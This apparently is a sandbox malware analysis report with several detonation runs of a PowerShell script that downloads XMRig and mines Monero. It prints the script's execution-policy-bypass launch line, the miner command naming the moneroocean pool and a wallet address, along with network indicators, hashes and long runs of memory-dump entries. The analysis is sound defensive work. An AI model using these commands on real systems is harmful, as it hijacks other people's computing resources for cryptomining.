memory/1464-84-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-85-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-86-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-87-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-88-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-89-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-90-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-91-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-92-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-93-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-94-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-95-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-96-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-97-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-98-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-99-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-100-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-101-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-102-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-103-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-104-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-105-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-106-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-107-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:09
Platform
win11-20240419-en
Max time kernel
1790s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4232 wrote to memory of 2196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4232 wrote to memory of 2196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4232-0-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fivqlp34.zdk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4232-9-0x0000022379260000-0x0000022379282000-memory.dmp
memory/4232-10-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4232-11-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4232-12-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4232-14-0x0000022379760000-0x0000022379772000-memory.dmp
memory/4232-15-0x00000223792D0000-0x00000223792DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2196-46-0x000001FB3DE50000-0x000001FB3DE70000-memory.dmp
memory/2196-47-0x000001FB3E170000-0x000001FB3E190000-memory.dmp
memory/4232-49-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/2196-48-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/4232-50-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
memory/2196-51-0x000001FB3E190000-0x000001FB3E1B0000-memory.dmp
memory/2196-52-0x000001FB3E1B0000-0x000001FB3E1D0000-memory.dmp
memory/2196-53-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-54-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-55-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-56-0x000001FB3E190000-0x000001FB3E1B0000-memory.dmp
memory/2196-57-0x000001FB3E1B0000-0x000001FB3E1D0000-memory.dmp
memory/2196-58-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-59-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-60-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-61-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-62-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-63-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-64-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-65-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-66-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-67-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-68-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-69-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-70-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-71-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-72-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-73-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-74-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-75-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-76-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-77-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-78-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-79-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-80-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-81-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-82-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-83-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-84-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-85-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-86-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-87-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-88-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-89-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-90-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-91-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-92-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-93-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-94-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-95-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-96-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-97-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-98-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-99-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-100-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-101-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-102-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-103-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-104-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-105-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-106-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-107-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-108-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-109-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-110-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-111-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-112-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-113-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-114-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-115-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
memory/2196-116-0x00007FF6162B0000-0x00007FF616EE3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:42
Platform
win10-20240611-en
Max time kernel
1796s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2148 wrote to memory of 3572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2148 wrote to memory of 3572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
memory/2148-0-0x00007FFF44693000-0x00007FFF44694000-memory.dmp
memory/2148-5-0x000001CAEC8B0000-0x000001CAEC8D2000-memory.dmp
memory/2148-8-0x00007FFF44690000-0x00007FFF4507C000-memory.dmp
memory/2148-9-0x000001CAECBE0000-0x000001CAECC56000-memory.dmp
memory/2148-10-0x00007FFF44690000-0x00007FFF4507C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5yen52c.lvg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2148-25-0x00007FFF44690000-0x00007FFF4507C000-memory.dmp
memory/2148-48-0x000001CAECD60000-0x000001CAECD72000-memory.dmp
memory/2148-61-0x000001CAECBA0000-0x000001CAECBAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3572-90-0x0000023EDF580000-0x0000023EDF5A0000-memory.dmp
memory/2148-92-0x00007FFF44693000-0x00007FFF44694000-memory.dmp
memory/3572-91-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/2148-93-0x00007FFF44690000-0x00007FFF4507C000-memory.dmp
memory/2148-95-0x00007FFF44690000-0x00007FFF4507C000-memory.dmp
memory/3572-94-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-96-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-97-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-98-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-99-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-100-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-101-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-102-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-103-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-104-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-105-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-106-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-107-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-108-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-109-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-110-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-111-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-112-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-113-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-114-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-115-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-116-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-117-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-118-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-119-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-120-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-121-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-122-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-123-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-124-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-125-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-126-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-127-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-128-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-129-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-130-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-131-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-132-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-133-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-134-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-135-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-136-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-137-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-138-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-139-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-140-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-141-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-142-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-143-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-144-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-145-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-146-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-147-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-148-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-149-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-150-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-151-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-152-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-153-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-154-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-155-0x00007FF785200000-0x00007FF785E33000-memory.dmp
memory/3572-156-0x00007FF785200000-0x00007FF785E33000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:42
Platform
win11-20240508-en
Max time kernel
1656s
Max time network
1666s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/2428-0-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phpsuupt.3ix.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2428-9-0x00000205B9CD0000-0x00000205B9CF2000-memory.dmp
memory/2428-10-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp
memory/2428-11-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp
memory/2428-12-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp
memory/2428-13-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp
memory/2428-14-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:51
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
